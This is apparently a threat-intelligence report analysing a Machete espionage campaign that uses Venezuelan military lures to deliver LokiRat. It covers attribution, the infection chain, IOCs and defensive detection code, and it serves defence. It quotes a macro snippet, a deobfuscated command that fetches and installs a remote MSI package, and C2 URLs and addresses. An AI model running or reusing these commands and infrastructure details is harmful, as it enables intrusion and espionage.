Machete, a Spanish-speaking cyber espionage threat group associated with the Machete malware family, used military-themed lures to drop LokiRat, based on ACTI analysis of samples identified on an open-source malware repository in October 2020. ACTI has observed this remote administration tool freely available on Brazilian dark web forums as well as online code repositories; however, this is the first time ACTI has observed the Machete group integrate LokiRat code into its toolset.

Background

Machete (referred to as BULLSHARK by Accenture Cyber Threat Intelligence) has likely been active since 2010. This threat group has primarily focused its computer network intrusion operations against military and government organizations in Latin America, in particular Venezuela, Ecuador, and Colombia.

Attribution

ACTI attributes the LokiRat campaign to the Machete threat group based on the document lures, document metadata showing the documents were drafted in Spanish, keylogger code targeting systems set to Spanish, and overlap with Python code used in Machete campaigns that ACTI analyzed previously.

This recent campaign is within the group’s typical target set and appears to be targeting the Venezuelan military, judging from the spearphishing lure used. Based on the assessed targeted military organization and the observed tactics, techniques and procedures (TTPs), Accenture CTI assesses that Machete is likely associated with an unknown government based in or near Latin America.

The code and infrastructure also contain Russian-language strings, although these strings are seemingly arbitrary and not suggestive of Russian origin. For example, in the code snippets shown below, the code authors changed one of the HTTP request fields from ‘Black_Lightning’ to ‘Utopiya_Nyusha_Maksim’, which suggests the string was changed after the code was already developed and is not an artifact from the original developers. ACTI assesses that the Russian-language artifacts are likely the threat actor’s attempt to introduce misattribution.

[Image] Machete code from 2019

[Image] Machete code from 2020

Spearphishing lures imitate military documents

The Machete threat group is known to use real military documents as decoy files in its phishing campaigns, as documented by ESET in 2019, and the lure in this campaign follows this trend: a likely stolen Venezuelan military document was used as the lure. The threat actors have recently included the lure inside a weaponized file. Although the lure had a .doc extension, it was an ActiveMime web page archive with malicious macros.

[Image] Example of one of the lures

The threat actors used ActiveMime archives to increase the obfuscation of their lures. This format encodes and compresses the malicious macro, which can help the macro evade anti-virus products and other defenses aimed at identifying malicious code strings. Because the lure is disguised with a .doc extension, the victim user often does not realize it is not a typical Word document when they receive it.
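As an added defender-side check (not code from the report), the following Python classifies a file by its leading bytes instead of its extension and flags a MIME web archive carrying an ActiveMime part. The sample archive is constructed here; the `application/x-mso` part and the base64-encoded `ActiveMime` signature are the standard layout of a Word MHTML file.

```python
import base64
import re

OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # binary .doc (OLE compound file)
ZIP_MAGIC = b"PK\x03\x04"                          # .docx/.docm (OOXML zip)
# The ActiveMime container is stored base64-encoded inside an application/x-mso
# part. Encoding the first nine bytes of its "ActiveMime" signature gives the
# 12-character prefix that opens that part's body (nine bytes keep alignment).
ACTIVEMIME_B64 = base64.b64encode(b"ActiveMim")

def classify_word_container(data):
    """Say what a file is from its bytes, ignoring whatever extension it carries."""
    head = data[:64]
    if head.startswith(OLE_MAGIC):
        return "ole-compound"
    if head.startswith(ZIP_MAGIC):
        return "ooxml-zip"
    if re.match(rb"\s*MIME-Version:", head, re.I):
        return "mhtml"
    return "unknown"

def triage(filename, data):
    """Flag a web-page archive posing as .doc and whether it carries an ActiveMime part."""
    kind = classify_word_container(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    has_mso = kind == "mhtml" and b"application/x-mso" in data and ACTIVEMIME_B64 in data
    return {
        "kind": kind,
        "activemime_part": has_mso,
        "extension_mismatch": ext == "doc" and kind not in ("ole-compound", "ooxml-zip"),
    }

# Constructed sample, not the campaign's lure: a minimal MHTML wrapper with an x-mso part.
SAMPLE_MHTML = (
    b"MIME-Version: 1.0\r\n"
    b'Content-Type: multipart/related; boundary="----=_NextPart_01"\r\n\r\n'
    b"------=_NextPart_01\r\n"
    b"Content-Type: application/x-mso\r\n"
    b"Content-Transfer-Encoding: base64\r\n\r\n"
    + base64.b64encode(b"ActiveMime" + b"\x00" * 20) + b"\r\n"
    + b"------=_NextPart_01--\r\n"
)

if __name__ == "__main__":
    print(triage("lure.doc", SAMPLE_MHTML))
```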

Adding LokiRat to their toolset

In this latest campaign Machete integrated Python code from LokiRat into its custom Machete code, a first for the group. The similarities in the code between previous campaigns and this recent campaign bolster our assessment that LokiRat was integrated into the group’s bespoke malware and that the Machete nation-state group carried out this campaign.

Most of the core functionality that LokiRat provides has been in the Machete framework for many years, but the LokiRat code gives the threat actors a couple of new benefits. First, it expands the capabilities available to Machete operators by including functions to:

  • Extract browser passwords from Chrome and FireFox
  • Capture keystrokes
  • Take screenshots
  • Employ self-cleanup by deleting LokiRat and auxiliary Python files
  • Create, modify, and delete files

The below screen capture shows Machete keylogging functionality code from the 2019 Machete campaigns.

[Image] Keylogging functionality code from 2019

The below screenshot captures similar code used in this campaign.

[Image] Keylogging functionality code from 2020

Second, it allows Machete operators to use the HTTP protocol for communications instead of FTP, the latter of which exposes the usernames and passwords used to log in to the operator’s command-and-control (C2) server. The LokiRat code also facilitates interaction between the compromised host and the C2 server by executing the following commands:

  • Uploading / downloading files
  • Running native shell commands
  • Compressing archives

Conclusion

Machete has a long history of cyber espionage, and the group is known for targeting Latin American entities, an area that is underreported by security vendors. Machete’s main toolset, Machete, has been thoroughly analyzed by researchers, which has increased its detection rates by anti-malware solutions. Evolving tactics and utilizing open-source code enable the malware, at least for a short time, to stay under the radar.

The Accenture Cyber Threat Intelligence (ACTI) team provides actionable and relevant threat intelligence to support decision makers. The intelligence analysis and assessments in this report are grounded in verified facts; more information on this activity is available to subscription customers on ACTI IntelGraph. IntelGraph is a proprietary next generation security intelligence platform that allows users to search, visualize, and contextualize the relationships between malicious actors, their tools and the vulnerabilities they exploit.

MITRE ATT&CK® Techniques

| Tactic | Technique ID | Technique Name |
| --- | --- | --- |
| Initial Access | T1566.001 | Spearphishing Attachment |
| Execution | T1059 | Command-line Interface |
| Execution | T1053 | Scheduled Task |
| Execution | T1064 | Scripting |
| Persistence | T1053 | Scheduled Task |
| Discovery | T1083 | File and Directory Discovery |
| Discovery | T1082 | System Information Discovery |
| Collection | T1119 | Automated Collection |
| Collection | T1074 | Data Staged |
| Command and Control | T1041 | Exfiltration Over Command and Control Channel |

Accenture Security

Accenture Security is a leading provider of end-to-end cybersecurity services, including advanced cyber defense, applied cybersecurity solutions and managed security operations. We bring security innovation, coupled with global scale and a worldwide delivery capability through our network of Advanced Technology and Intelligent Operations centers. Helped by our team of highly skilled professionals, we enable clients to innovate safely, build cyber resilience and grow with confidence.  Follow us @AccentureSecure on Twitter or visit us at www.accenture.com/security.

Accenture, the Accenture logo, and other trademarks, service marks, and designs are registered or unregistered trademarks of Accenture and its subsidiaries in the United States and in foreign countries. All trademarks are properties of their respective owners. All materials are intended for the original recipient only. The reproduction and distribution of this material is forbidden without express written permission from Accenture. The opinions, statements, and assessments in this report are solely those of the individual author(s) and do not constitute legal advice, nor do they necessarily reflect the views of Accenture, its subsidiaries, or affiliates. Given the inherent nature of threat intelligence, the content contained in this report is based on information gathered and understood at the time of its creation. It is subject to change. Accenture provides the information on an “as-is” basis without representation or warranty and accepts no liability for any action or failure to act taken in response to the information contained or referenced in this report.

Copyright © 2020 Accenture. All rights reserved.

Technical details

Initial access

The spear phishing lures in this campaign, which were uploaded to VirusTotal, utilized images from internal Venezuelan military memos, similar to what has been previously reported. These images were likely stolen from the Venezuelan military during previous operations. Exhibits #1 and #2 show examples of the images used in this campaign.

[Image] Exhibit 1: Image used in spearphishing lure #1

[Image] Exhibit 2: Image used in spearphishing lure #2

Machete actors designed ActiveMime web page archives with malicious macros that they saved as “.doc” files.

Lure document execution

These documents contained malicious VBA macros. The macro contents are password protected to deter users from reading the code in Word; however, the code is readable using the OleVBA tool, as shown in Exhibit 3:

[Image] Exhibit 3: Contents of malicious macros

To ensure the malicious macros execute when the user opens the document and enables macros, the VBA code contains two auto-start methods: `Sub AutoOpen()` and `Sub Auto_Open()`. Both methods point to the same function.

The VBA macro concatenates single-byte characters to build the string `C:\ProgramData\00011g.vbe`, the path of the file that will hold the VBScript code embedded in the lure document and executed in the next step.

To hide the malicious VBScript contents within the Word document, the malware authors write the strings to the footer of the document using a font size of 1, which makes the strings invisible to the human eye. The VBA macro extracts the strings using the following code:

```vb
With ActiveDocument.Sections(1)
    Dim Wrd As String
    ' Read the text of the primary footer, where the VBScript is hidden in 1-point font
    Wrd = .Footers(wdHeaderFooterPrimary).Range.Text
End With
```

The strings are then written to the file created earlier, `C:\ProgramData\00011g.vbe`.

The raw contents of the VBScript are:

[Image] Exhibit 4: Contents of malicious VBScript

The deobfuscated VBScript contents are:

`"C:\Windows\System32\cmd.exe" /NOCONSOLE /c msiexec /q /i https://cutt.ly/LgliNoc`

The VBScript executes msiexec to fetch an MSI file using the shortened URL `https://cutt[.]ly/LgliNoc`. (The original URL is `https://surgutneftegazappstore[.]com/poiuytrewq/mplayer.msi`.) The contents of the MSI file are shown in Exhibit 5:

[Image] Exhibit 5: MSI contents

LokiRat installation phase

The MSI file contains two files: a benign DLL file and a file named `bz.WrappedSetupProgram`.

The malicious contents exist within `bz.WrappedSetupProgram`, a compressed archive. This CAB archive contains 141 directories and 1,278 files. The contents of this archive are saved into the `%appdata%\ ` directory.

Upon execution, the archive launches a portable executable file named `Projec.exe`.

As shown in Exhibit 6, the executable hides the current window, sleeps for 60 seconds, and uses `WinExec` to run the command:

`cmd /NOCONSOLE /c mplayer\Updatewmplayer.exe mplayer\Presk`

[Image] Exhibit 6: Projec's main function

The developers renamed the legitimate Python 2.7 `pythonw.exe` interpreter to `Updatewmplayer.exe`. The file launches the Python code stored in `mplayer\Presk`.
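The execution chain described above (a staged .vbe under ProgramData, msiexec installing a package straight from a URL, and a renamed Python interpreter) leaves process-creation traces a detection engineer can key on. The following Python is an added illustration, not code from the report: it runs three such rules over constructed Sysmon Event ID 1 style records; the paths, the use of wscript to run the .vbe, and the `OriginalFileName` values are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Constructed process-creation records; not telemetry from the campaign.
EVENTS = [
    {"Image": r"C:\Windows\System32\wscript.exe", "OriginalFileName": "wscript.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\Office16\WINWORD.EXE",
     "CommandLine": r'"C:\Windows\System32\wscript.exe" C:\ProgramData\00011g.vbe'},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"msiexec /q /i https://shortener.invalid/pkg"},
    {"Image": r"C:\Users\u\AppData\Roaming\KMPlayer\mplayer\Updatewmplayer.exe",
     "OriginalFileName": "pythonw.exe",          # version resource keeps the real name
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"mplayer\Updatewmplayer.exe mplayer\Presk"},
    {"Image": r"C:\Windows\System32\msiexec.exe", "OriginalFileName": "msiexec.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"msiexec /i C:\Users\u\Downloads\vendor.msi"},  # benign local install
]

def vbe_from_programdata(e):
    # A script host running an encoded VBScript staged under C:\ProgramData.
    return re.search(r"\\ProgramData\\[^\s\"]+\.vbe\b", e["CommandLine"], re.I) is not None

def msiexec_remote_package(e):
    # msiexec told to install a package directly from an http(s) URL, no local file.
    return (PureWindowsPath(e["Image"]).name.lower() == "msiexec.exe"
            and re.search(r"(?:^|\s)/i\s+https?://", e["CommandLine"], re.I) is not None)

def renamed_python_interpreter(e):
    # The PE says it is Python, but the file on disk carries a different name.
    original = e["OriginalFileName"].lower()
    return (original in {"python.exe", "pythonw.exe"}
            and PureWindowsPath(e["Image"]).name.lower() != original)

RULES = [vbe_from_programdata, msiexec_remote_package, renamed_python_interpreter]

def detect(events):
    """Return (event index, rule name) for every rule that fires on every event."""
    return [(i, rule.__name__) for i, e in enumerate(events) for rule in RULES if rule(e)]

if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(f"event {idx}: {name}: {EVENTS[idx]['CommandLine']}")
```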

The Python script `Presk` sets up LokiRat and performs the following actions:

  • Changes the directory attributes of `\KMPlayer` to HIDDEN.
  • Removes the file `Projec.exe`, which is no longer needed for execution.
  • Creates a persistent scheduled task that executes the legitimate, renamed Python interpreter `Updatewmplayer.exe` with the following argument: `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\Datawmplayer`

The file `Datawmplayer` is a modified version of LokiRat. Upon execution, the RAT reads a text file from:

`\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\license.dll` (Note the bogus .dll extension.)

LokiRat command and control

Initially, the `license.dll` file contains the URL https://ultracifrado.blogspot[.]com/ as a Base64-encoded string. The domain is shown in Exhibit 7.

[Image] Exhibit 7: Contents of malicious domain

The RAT communicates with the above domain and performs the following command-and-control (C2) operations:

  • Makes a request to the https://ultracifrado.blogspot[.]com domain and parses the contents of the response.
  • Searches for the string delimiter `amar` and Base64 decodes the contents.
  • Uses the decoded string for the backdoor implant's C2 communications.

ACTI analysts captured the C2 server address used in this campaign as http://31.207.45[.]243:8080.
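The two-stage lookup described above (a Base64 URL in `license.dll`, then a Base64 C2 address framed by the `amar` marker on the fetched page) is a dead-drop resolver, and an analyst triaging a captured page can decode it offline. The following Python is an added example, not code from the report or from LokiRat; it assumes the blob sits between two occurrences of the marker, and the sample page and TEST-NET C2 address are constructed.

```python
import base64
import re

DELIMITER = "amar"   # marker string observed in the campaign

def decode_resolver_url(license_contents):
    """Stage 1: the Base64 string stored in license.dll decodes to the dead-drop page URL."""
    return base64.b64decode(license_contents.strip()).decode("utf-8")

def resolve_c2(page_html, delimiter=DELIMITER):
    """Stage 2: decode every Base64 blob framed by a pair of delimiters into a C2 URL.

    Anything between two markers that is not valid Base64, or does not decode to an
    http(s) URL (e.g. the letters of a Spanish word containing 'amar'), is skipped.
    """
    framed = re.escape(delimiter) + r"([A-Za-z0-9+/=\s]+?)" + re.escape(delimiter)
    urls = []
    for blob in re.findall(framed, page_html):
        try:
            text = base64.b64decode("".join(blob.split()), validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if re.match(r"https?://\S+$", text):
            urls.append(text)
    return urls

# Constructed samples; not artifacts captured from the campaign.
SAMPLE_LICENSE = base64.b64encode(b"https://resolver.example/").decode()
SAMPLE_PAGE = (
    "<html><body><p>el color amarillo</p>"
    "<p>amar" + base64.b64encode(b"http://203.0.113.10:8080").decode() + "amar</p>"
    "</body></html>"
)

if __name__ == "__main__":
    print(decode_resolver_url(SAMPLE_LICENSE), resolve_c2(SAMPLE_PAGE))
```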

As of the time of this writing, the page at `https://ultracifrado.blogspot[.]com/` contains code indicating that these two URLs are also used in other Machete campaigns:

  - http://185.70.187[.]110/Rumpwltop.php
  - https://surgutneftegazappstore[.]com/KK2/katiusk.php

LokiRat capabilities

The modified version of LokiRat is self-documented; Exhibit 8, below, shows its main features:

[Image] Exhibit 8: LokiRat's functionalities

Auxiliary Python files

The Python files below complement LokiRat’s functionality. Most of the code is re-used from previous Machete campaigns.

  • Presk creates the persistence mechanism. The code creates a scheduled task to run every 5 minutes named Datawmplayer that executes the main LokiRat payload stored at `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\Datawmplayer`
  • Dropmplayer creates a directory under %appdata%\\Microsoft\\WindowsCenter\\dream to store profile data extracted and .zip compressed from Chrome, Safari, Opera, and FireFox.
  • wmUpdate contains keylogging code functionality targeting systems using Spanish as the language. Keystrokes are logged in `\\KMPlayer\\mplayer\\Lib\\site-packages\\Player\\-vpr.html`

IOCs

To mitigate against this campaign, ACTI suggests checking network logs for indicators related to these backdoors including the following IOCs:

| SHA256 | Filename | Classification |
| --- | --- | --- |
| 2a9a9e9d927993ce878125868526fb6d288325b5ced041f75fabce8dede62657 | plan de defensa 001.doc | Malicious Document |
| 8db7f295d8711de2773e5015a8ed6e067a51d4f34f173936b3ccee718937a6c2 | armamento 001.doc | Malicious Document |
| 89458aa5e86a632cef1c9c56906ba8ac6b60bb692d77e3fb28d38bd70bb55907 | mplayer.msi | MSI |
| 009ae97fdc8fe93303f096d5a488aa0ae9e612d6d609f89e1409dd69ef2fa95f | Binary.bz.WrappedSetupProgram | CAB |
| 38c46066a655f270d9f587e3654d97b94245ffd4ba5748d12540f942ed9f0d4b | Projec.exe | Installer |
| ca0df6cccf2a15ce8f781d81959cf230aead64e6297a3283b21457dc74938c89 | Presk | Aux python file |
| 2b6b6307b0b1186eec6d7b1e4f181767ea7ade1cc1d4e1374e10422bf7ea63dd | Datawmplayer | LokiRat |
| e328cb7bf8cdaa770370af9d56a009dca5923dc3569ff4ae5fc7e94d80a5194b | Dropmplayer | Aux python file |
| 9ad3855b57f304940ca8140c3e210184f6c54bc65687dd4f84e930f6af69cea5 | wmUpdate | Aux python file |
C&C URLs

http://185.70.187[.]110/Rumpwltop.php
https://surgutneftegazappstore[.]com/KK2/katiusk.php
https://cutt[.]ly/LgliNoc
https://surgutneftegazappstore[.]com/poiuytrewq/mplayer.msi

Edson Sierra

Security Innovation Associate Principal


Hannah Meyerfeld

Cyber Threat Intelligence Senior Researcher
